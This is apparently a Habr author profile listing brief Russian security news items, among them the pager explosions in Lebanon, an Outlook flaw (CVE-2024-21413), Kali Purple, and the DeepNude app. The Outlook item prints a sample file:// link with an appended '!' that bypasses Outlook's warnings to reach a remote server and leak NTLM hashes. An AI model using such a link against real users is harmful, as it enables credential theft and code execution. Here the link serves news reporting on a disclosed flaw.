Pull to refresh
261
4.4
Лука Сафонов @LukaSafonov

информационная опасность

Send message

Wake-on-die: cотни членов «Хезболлы» пострадали при взрыве пейджеров

Reading time1 min
Views16K

Более 2000 пейджеров и раций взорвались у представителей Хезболлы в Ливане, что привело к десяткам погибших и сотням раненых. Подрыв был инициирован удаленно, предположительно спецслужбами Израиля.

Читать далее

RCE-уязвимость в Outlook приводит к удаленному выполнению кода

Reading time1 min
Views4.9K

Уязвимость, обнаруженная компанией Check Point, получила обозначение CVE-2024-21413. Она активируется при открытии электронных писем с вредоносными ссылками в уязвимых версиях Outlook. Уязвимость затрагивает несколько продуктов Office, включая Microsoft Office LTSC 2021, Microsoft 365 для предприятий, а также Microsoft Outlook 2016 и Microsoft Office 2019. 

Уязвимость позволяет обходить встроенные защиты Outlook для вредоносных ссылок, встроенных в электронные письма, используя протокол file://, обращаясь через него к удалённому серверу злоумышленников.

Добавление восклицательного знака сразу после расширения документа позволяет обойти ограничения безопасности Outlook. В этом случае при нажатии на ссылку приложение будет обращаться к удалённому ресурсу и открывать целевой файл без вывода предупреждений или ошибок.

<a href="file:///\\10.10.111.111\test\test.rtf!something">ССЫЛКА</a>

Уязвимость позволяет удаленному атакующиему получить NTLM-хеш пользователя, выполнить произвольный код с помощью злонамеренно созданных документов Office и т.д.

На Github опубликован PoC.

Читать далее

4-5 декабря в Москве состоится ежегодная Открытая конференция ИСП РАН

Reading time2 min
Views1.4K

4-5 декабря в главном здании Российской академии наук в Москве состоится ежегодная Открытая конференция ИСП РАН им. В.П. Иванникова, посвящённая 75-летию отечественных информационных технологий. Важной частью конференции станет секция «Образование, технологии, сообщество: системный подход к безопасной разработке».

Читать далее

Kali purple: теперь и для защиты

Reading time1 min
Views10K

Offensive Security выпустила дистрибутив Kali Linux 2023.1, первую в 2023 году версию (к тому же приуроченную к десятилетию проекта) с новым дистрибутивом Kali Purple, который предназначен для blue и purple team, то есть ориентирован для защитников инфраструктуры.

Теперь доступен некий баланс при проведении киберучений: специалисты по тестированию на проникновение со стандартным Kali против blue team команды, у которой теперь есть свой "swiss-knife-box" для мониторинга и отражения атак.

Читать далее

YouTube удаляет инструкции по хакингу

Reading time2 min
Views34K
image

Крупнейший видео-хостинг Youtube обновил правила в отношении вредного и опасного контента и внес новую политику запрета, касающегося контента, обучающего хакерству и фишингу. Уже есть первые «жертвы».
Читать дальше →

Нейросеть научилась раздевать женщин

Reading time1 min
Views159K


В сети появилось приложение DeepNude, с помощью которого можно раздевать людей на фотографиях.

Алгоритм при помощи нейросетей создает реалистичные снимки голых женщин. Для этого необходимо загрузить фото, после чего приложение анализирует изображение и заменяет одежду на обнаженную грудь и половые органы.
Читать дальше →

updated: Zero-Click Server-Side RCE в njs

Reading time1 min
Views12K
image

Известная исследовательница Алиса Шевченко alisaesage обнаружила уязвимость удаленного выполнения произвольного кода в последних версиях веб-сервера nginx.

UPD: Не nginx, а njs, не уязвимость, а просто баг (уже пофикшен в последней версии) — компания Nginx отписалась, что этот баг не может быть использован как уязвимость. (спасибо lega за уточнение)
Читать дальше →

Обнаружена RCE-уязвимость в приложении Блокнот Windows

Reading time1 min
Views8.7K
image

Исследователь в области безопасности Тэвис Орманди, работающий с проектом Google Project Zero, обнаружил уязвимость в текстовом редакторе «Блокнот» от Microsoft. По словам эксперта, эта проблема может привести к удаленному выполнению кода (RCE).
Читать дальше →

TeamViewer всё-таки был взломан в 2016 году

Reading time2 min
Views30K
image

Немецкая газета Der Spiegel сообщила, что немецкая софтверная компания TeamViewer, одна из самых популярных программ в мире, которая позволяет пользователям удаленно получать доступ к своим рабочим столам и делиться ими, была скомпрометирована в 2016 году.
Читать дальше →

Tenable обновила свой бесплатный инструмент для анализа уязвимостей

Reading time2 min
Views8.1K
image

Tenable обновил свой бесплатный инструмент для анализа уязвимостей Nessus Essentials (ранее Nessus Home) — без ограничения «для некоммерческого использования».
Читать дальше →

Команда Google Project Zero запустила проект об уязвимостях «нулевого дня»

Reading time1 min
Views5K
image

Команда Google Project Zero запустила проект под названием 0-Day «In the Wild», который позволит отслеживать уязвимости т.н. нулевого дня, для которых не существует патча.
Читать дальше →

В ответ на кибератаку Израиль нанёс авиаудар

Reading time1 min
Views40K
image

Это будет один из наиболее показательных случаев вычисления по IP и применения превентивных мер защиты от кибернападений: Армия обороны Израиля (ЦАХАЛ) нейтрализовала попытку кибератаки, нанеся авиаудары по зданию в секторе Газа, где находилась штаб-квартира хакеров ХАМАС.

Information

Rating
1,040-th
Location
Москва, Москва и Московская обл., Россия
Works in
Date of birth
Registered
Activity

Specialization

Chief Technology Officer (CTO)
Information Security